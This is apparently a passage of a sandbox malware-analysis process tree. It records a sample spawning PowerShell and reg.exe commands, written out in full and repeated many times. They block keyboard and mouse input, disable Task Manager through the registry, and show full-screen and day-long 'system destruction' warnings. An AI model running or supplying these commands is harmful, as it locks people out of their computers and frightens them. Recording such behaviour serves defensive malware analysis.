        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\nkqaphns\nkqaphns.cmdline"
        52⤵
        
        PID:5428
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System.Runtime.InteropServices; public class InputBlock { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [InputBlock]::BlockInput($true)"
        51⤵
        
        PID:5556
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\h1x33ybq\h1x33ybq.cmdline"
        52⤵
        
        PID:6724
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2DD1.tmp" "c:\Users\Admin\AppData\Local\Temp\h1x33ybq\CSCB15EB6DB2546D3956E3CB48DF55E3.TMP"
        53⤵
        
        PID:6988
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
        51⤵
        
        PID:3540
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class DisableKeys { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [DisableKeys]::BlockInput($true)"
        51⤵
        
        PID:7308
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\t4oqlz30\t4oqlz30.cmdline"
        52⤵
        
        PID:8028
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3573.tmp" "c:\Users\Admin\AppData\Local\Temp\t4oqlz30\CSC8BDAC862A734C0DB72ABD61D8A53FF9.TMP"
        53⤵
        
        PID:3336
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$obj = New-Object -ComObject WScript.Shell; $obj.SendKeys('{TAB}')"
        51⤵
        
        PID:8096
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "$form = New-Object Windows.Forms.Form; $form.WindowState = 'Maximized'; $form.TopMost = $true; $form.BackColor = 'Black'; $label = New-Object Windows.Forms.Label; $label.Text = 'WARNING: SYSTEM DESTRUCTION INITIATED!'; $label.ForeColor = 'Red'; $label.Font = 'Microsoft Sans Serif, 48pt'; $label.AutoSize = $true; $label.TextAlign = 'MiddleCenter'; $form.Controls.Add($label); $form.ShowDialog()"
        51⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1020
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        49⤵
        
        PID:6476
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zmeinkba\zmeinkba.cmdline"
        50⤵
        
        PID:1340
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System.Runtime.InteropServices; public class InputBlock { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [InputBlock]::BlockInput($true)"
        49⤵
        
        PID:6532
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4tumig3i\4tumig3i.cmdline"
        50⤵
        
        PID:5264
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES31AA.tmp" "c:\Users\Admin\AppData\Local\Temp\4tumig3i\CSC5A08167B998943909AB7FBE2E57ACA6F.TMP"
        51⤵
        
        PID:7560
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
        49⤵
        
        PID:7436
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class DisableKeys { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [DisableKeys]::BlockInput($true)"
        49⤵
        
        PID:7920
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gf0pk5jw\gf0pk5jw.cmdline"
        50⤵
        
        PID:7968
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES395B.tmp" "c:\Users\Admin\AppData\Local\Temp\gf0pk5jw\CSC708C7FF24F944C01AA1146BEF63E92.TMP"
        51⤵
        
        PID:7776
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$obj = New-Object -ComObject WScript.Shell; $obj.SendKeys('{TAB}')"
        49⤵
        
        PID:5636
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "$form = New-Object Windows.Forms.Form; $form.WindowState = 'Maximized'; $form.TopMost = $true; $form.BackColor = 'Black'; $label = New-Object Windows.Forms.Label; $label.Text = 'WARNING: SYSTEM DESTRUCTION INITIATED!'; $label.ForeColor = 'Red'; $label.Font = 'Microsoft Sans Serif, 48pt'; $label.AutoSize = $true; $label.TextAlign = 'MiddleCenter'; $form.Controls.Add($label); $form.ShowDialog()"
        49⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3488
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        47⤵
        
        PID:6536
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5hrrfiz4\5hrrfiz4.cmdline"
        48⤵
        
        PID:7096
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System.Runtime.InteropServices; public class InputBlock { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [InputBlock]::BlockInput($true)"
        47⤵
        
        PID:7176
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\1m5uwvao\1m5uwvao.cmdline"
        48⤵
        
        PID:5500
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES23BF.tmp" "c:\Users\Admin\AppData\Local\Temp\1m5uwvao\CSC9EB2F74347E24BE9BD1171D8923DBDA.TMP"
        49⤵
        
        PID:8092
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
        47⤵
        
        PID:4916
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class DisableKeys { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [DisableKeys]::BlockInput($true)"
        47⤵
        
        PID:7684
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gwdgmjzl\gwdgmjzl.cmdline"
        48⤵
        
        PID:808
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2AD4.tmp" "c:\Users\Admin\AppData\Local\Temp\gwdgmjzl\CSC1382F681BF1E4F2FBEEF75C76583F3.TMP"
        49⤵
        
        PID:7384
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$obj = New-Object -ComObject WScript.Shell; $obj.SendKeys('{TAB}')"
        47⤵
        
        PID:5376
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "$form = New-Object Windows.Forms.Form; $form.WindowState = 'Maximized'; $form.TopMost = $true; $form.BackColor = 'Black'; $label = New-Object Windows.Forms.Label; $label.Text = 'WARNING: SYSTEM DESTRUCTION INITIATED!'; $label.ForeColor = 'Red'; $label.Font = 'Microsoft Sans Serif, 48pt'; $label.AutoSize = $true; $label.TextAlign = 'MiddleCenter'; $form.Controls.Add($label); $form.ShowDialog()"
        47⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7448
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        45⤵
        
        PID:5072
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\on5fkc01\on5fkc01.cmdline"
        46⤵
        
        PID:6312
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System.Runtime.InteropServices; public class InputBlock { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [InputBlock]::BlockInput($true)"
        45⤵
        
        PID:2652
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\nzmjpdji\nzmjpdji.cmdline"
        46⤵
        
        PID:7772
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1E51.tmp" "c:\Users\Admin\AppData\Local\Temp\nzmjpdji\CSCE15A685FD4264C36A13FDC3770E15348.TMP"
        47⤵
        
        PID:7848
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
        45⤵
        
        PID:7192
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class DisableKeys { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [DisableKeys]::BlockInput($true)"
        45⤵
        
        PID:7228
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\t4abamf4\t4abamf4.cmdline"
        46⤵
        
        PID:7400
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2584.tmp" "c:\Users\Admin\AppData\Local\Temp\t4abamf4\CSCA1D9543DCEA948BFBB69A85C25499EF0.TMP"
        47⤵
        
        PID:7268
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$obj = New-Object -ComObject WScript.Shell; $obj.SendKeys('{TAB}')"
        45⤵
        
        PID:5200
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "$form = New-Object Windows.Forms.Form; $form.WindowState = 'Maximized'; $form.TopMost = $true; $form.BackColor = 'Black'; $label = New-Object Windows.Forms.Label; $label.Text = 'WARNING: SYSTEM DESTRUCTION INITIATED!'; $label.ForeColor = 'Red'; $label.Font = 'Microsoft Sans Serif, 48pt'; $label.AutoSize = $true; $label.TextAlign = 'MiddleCenter'; $form.Controls.Add($label); $form.ShowDialog()"
        45⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6588
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        43⤵
        
        PID:424
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\umjjgzsa\umjjgzsa.cmdline"
        44⤵
        
        PID:5904
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System.Runtime.InteropServices; public class InputBlock { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [InputBlock]::BlockInput($true)"
        43⤵
        
        PID:5664
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gtdtdxaj\gtdtdxaj.cmdline"
        44⤵
        
        PID:6876
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1901.tmp" "c:\Users\Admin\AppData\Local\Temp\gtdtdxaj\CSC69E1E455EE8F457785BC7DA232D17E19.TMP"
        45⤵
        
        PID:5312
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
        43⤵
        
        PID:5072
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class DisableKeys { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [DisableKeys]::BlockInput($true)"
        43⤵
        
        PID:7268
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\myad0vhc\myad0vhc.cmdline"
        44⤵
        
        PID:7964
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1EED.tmp" "c:\Users\Admin\AppData\Local\Temp\myad0vhc\CSC11878EF4F5147E7A25CE2C16316C5.TMP"
        45⤵
        
        PID:8056
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$obj = New-Object -ComObject WScript.Shell; $obj.SendKeys('{TAB}')"
        43⤵
        
        PID:5636
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "$form = New-Object Windows.Forms.Form; $form.WindowState = 'Maximized'; $form.TopMost = $true; $form.BackColor = 'Black'; $label = New-Object Windows.Forms.Label; $label.Text = 'WARNING: SYSTEM DESTRUCTION INITIATED!'; $label.ForeColor = 'Red'; $label.Font = 'Microsoft Sans Serif, 48pt'; $label.AutoSize = $true; $label.TextAlign = 'MiddleCenter'; $form.Controls.Add($label); $form.ShowDialog()"
        43⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7976
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        41⤵
        
        PID:5888
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gaxqi0kx\gaxqi0kx.cmdline"
        42⤵
        
        PID:5404
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System.Runtime.InteropServices; public class InputBlock { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [InputBlock]::BlockInput($true)"
        41⤵
        
        PID:4676
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\kuidskte\kuidskte.cmdline"
        42⤵
        
        PID:6172
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES14DB.tmp" "c:\Users\Admin\AppData\Local\Temp\kuidskte\CSCF1A84A1B69684503AFA9F2FF44E9E995.TMP"
        43⤵
        
        PID:6872
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
        41⤵
        
        PID:5516
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class DisableKeys { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [DisableKeys]::BlockInput($true)"
        41⤵
        
        PID:5888
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\x3lxsmud\x3lxsmud.cmdline"
        42⤵
        
        PID:7196
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1B82.tmp" "c:\Users\Admin\AppData\Local\Temp\x3lxsmud\CSCA945EECBD48C43109F291D1CACCACE3D.TMP"
        43⤵
        
        PID:7256
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$obj = New-Object -ComObject WScript.Shell; $obj.SendKeys('{TAB}')"
        41⤵
        
        PID:7544
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "$form = New-Object Windows.Forms.Form; $form.WindowState = 'Maximized'; $form.TopMost = $true; $form.BackColor = 'Black'; $label = New-Object Windows.Forms.Label; $label.Text = 'WARNING: SYSTEM DESTRUCTION INITIATED!'; $label.ForeColor = 'Red'; $label.Font = 'Microsoft Sans Serif, 48pt'; $label.AutoSize = $true; $label.TextAlign = 'MiddleCenter'; $form.Controls.Add($label); $form.ShowDialog()"
        41⤵
        
        PID:6124
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        39⤵
        
        PID:3940
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\bdyfo1g1\bdyfo1g1.cmdline"
        40⤵
        
        PID:1184
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System.Runtime.InteropServices; public class InputBlock { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [InputBlock]::BlockInput($true)"
        39⤵
        
        PID:5932
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\usb51axq\usb51axq.cmdline"
        40⤵
        
        PID:6776
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDE6.tmp" "c:\Users\Admin\AppData\Local\Temp\usb51axq\CSC219567261933417F9CB9523528FAAF94.TMP"
        41⤵
        
        PID:6288
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
        39⤵
        
        PID:7104
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class DisableKeys { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [DisableKeys]::BlockInput($true)"
        39⤵
        
        PID:5932
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\drvsna1s\drvsna1s.cmdline"
        40⤵
        
        PID:5664
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1364.tmp" "c:\Users\Admin\AppData\Local\Temp\drvsna1s\CSCB59FE806DC964582A8A66555186EE4D.TMP"
        41⤵
        
        PID:1740
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$obj = New-Object -ComObject WScript.Shell; $obj.SendKeys('{TAB}')"
        39⤵
        
        PID:1200
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "$form = New-Object Windows.Forms.Form; $form.WindowState = 'Maximized'; $form.TopMost = $true; $form.BackColor = 'Black'; $label = New-Object Windows.Forms.Label; $label.Text = 'WARNING: SYSTEM DESTRUCTION INITIATED!'; $label.ForeColor = 'Red'; $label.Font = 'Microsoft Sans Serif, 48pt'; $label.AutoSize = $true; $label.TextAlign = 'MiddleCenter'; $form.Controls.Add($label); $form.ShowDialog()"
        39⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6228
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        37⤵
        
        PID:6120
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5ypsbqc4\5ypsbqc4.cmdline"
        38⤵
        
        PID:4808
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System.Runtime.InteropServices; public class InputBlock { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [InputBlock]::BlockInput($true)"
        37⤵
        
        PID:4160
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\fjg5akdi\fjg5akdi.cmdline"
        38⤵
        
        PID:4368
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9FE.tmp" "c:\Users\Admin\AppData\Local\Temp\fjg5akdi\CSCD00164988F834F7AA560B3E433CE2993.TMP"
        39⤵
        
        PID:6904
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
        37⤵
        
        PID:7088
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class DisableKeys { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [DisableKeys]::BlockInput($true)"
        37⤵
        
        PID:6272
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\pjmao3jd\pjmao3jd.cmdline"
        38⤵
        
        PID:6872
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF8B.tmp" "c:\Users\Admin\AppData\Local\Temp\pjmao3jd\CSCE241420D9A1245C99D9C63C938A8C1EA.TMP"
        39⤵
        
        PID:5628
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$obj = New-Object -ComObject WScript.Shell; $obj.SendKeys('{TAB}')"
        37⤵
        
        PID:2652
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
